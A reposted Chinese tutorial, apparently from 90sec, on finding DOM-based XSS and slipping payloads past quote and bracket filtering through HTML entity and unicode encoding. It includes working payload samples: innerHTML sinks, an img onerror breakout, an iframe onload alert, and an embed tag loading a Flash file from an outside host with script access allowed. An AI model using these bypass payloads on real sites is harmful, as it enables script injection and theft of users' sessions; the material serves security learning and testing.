也想出现在这里? 联系我们

关于DOM xss跨站的一点点经验之谈

作者 : 小编 本文共1919个字,预计阅读时间需要5分钟 发布时间: 2021-06-9 共4.98K人阅读
也想出现在这里? 联系我们

Xss的危害各位小牛 大牛们都意识到了Xss开始的csrf和挂马 到盗cookies和ajax 到xssshell 还有各种利用…. 我们一般找到的都是大多数都停留在找直接输入输出上,这类型的一般很容易被过滤。 隐蔽型的就是DOM xss了. 也就是不是直接输出的,句话话说,输出内容,在源代码里看不到. 比如你这里这个的话, 你右键,查看源代码的话 内容都是直接可以看到的这种就是直接 输入输出的 这个就是直接输出类型 对于查找DOM XSS的基本方法: 一般是这样的, 先发一个正常的内容, 然后F12打开调试工具(火狐Firebug插件); 定位到你发的内容上,调试工具里,有一个箭头,可以选择网页里指定的位置的. 然后看你发送的内容里 有没有什么隐藏的属性 或自定义属性 哦 通常的情况是<a href="xxx" title="你输入的某句话">xxxxxxx</a> 而且,“你输入的某句话” ,你直接查看源代码是看不到的 换句话说, <a href="xxx" title="你输入的某句话">xxxxxxx</a> 这个 是被动态产生的 这个时候,就有潜在的问题来了。 如果 “你输入的某句话” 写为xxxxxxxxx"><img><" 会变成<a href="xxx" title="xxxxxxxxx"><img><"">xxxxxxx</a> 就会插入一个HTML标签进去了 但是 实际情况下," , > 都是被过滤的(到了这里一般的黑友会说转义了过滤了啊没得突破了-_-我曾经也是这样) 你输入的某句话 写为 xxxxxxxxx&quot;&gt;&lt;img&gt;&lt;&quot; 由于是动态产生的 最后&quot; 会自动变为" 大家觉得很奇怪吧等下解释 &gt;—> > &lt; —-> <所以最后效果还是<a href="xxx" title="xxxxxxxxx"><img><"">xxxxxxx</a> (而且很多程序员,没有过滤& ) 下面我们本地测试下

复制代码

代码如下:

<div id=\”m\”>x</div> <script> var x=\”内容\”; document.getElementById(\”m\”).innerHTML=x; </script>

内容就是我们输入的内容如<script> <iframe>各种标签= =,这些在一般网站输入都被过滤了的 对< \’ ">等等各种转义了的话,我们突破就很难. 测试一下

复制代码

代码如下:

<script> function test(n){ alert(n);} </script> www.jb51.net <img src=\”1\” onerror=\”test(\’gainover\’)\”></img> <img src=\”1\” onerror=\”test(\’gainover&#x27);+function(){alert(/xx/)}()//\’)\”></img>&#x27

一个编码列子再给大家写个列子

复制代码

代码如下:

<div id=\”y\”></div> <img id=\”x\” class=\”audio\” src=\”xxxx\” border=\”0\” alt=\”mp3;http://xsst.sinaapp.com/Xss.swf&quot;><embed src=&quot;http://xsst.sinaapp.com/Xss.swf&quot;type=&quot;application/x-shockwave-flash&quot;allowscriptaccess=&quot;always&quot;><#.mp3\”></p> <script> document.getElementById(\”y\”).innerHTML=document.getElementById(\”x\”).alt; </script>xxx.innerHTML= yyy.

某个属性- -成功编码绕过("=&quot=')编码问题不是我开发的别问我了-_-~! 我们还可以这样来测试下

复制代码

代码如下:

<div id=\”m\”>x</div> <script> var x=\”\\u003ciframe onload=alert(1)\\u003e\”; document.getElementById(\”m\”).innerHTML=x; </script>

Unicode字符列表:http://zh.wikipedia.org/wiki/Unicode%E5%AD%97%E7%AC%A6%E5%88%97%E8%A1%A8 Xss安全测试字符转换工具:http://app.baidu.com/app/enter?appid=280383 作者 90sec

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 关于DOM xss跨站的一点点经验之谈

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录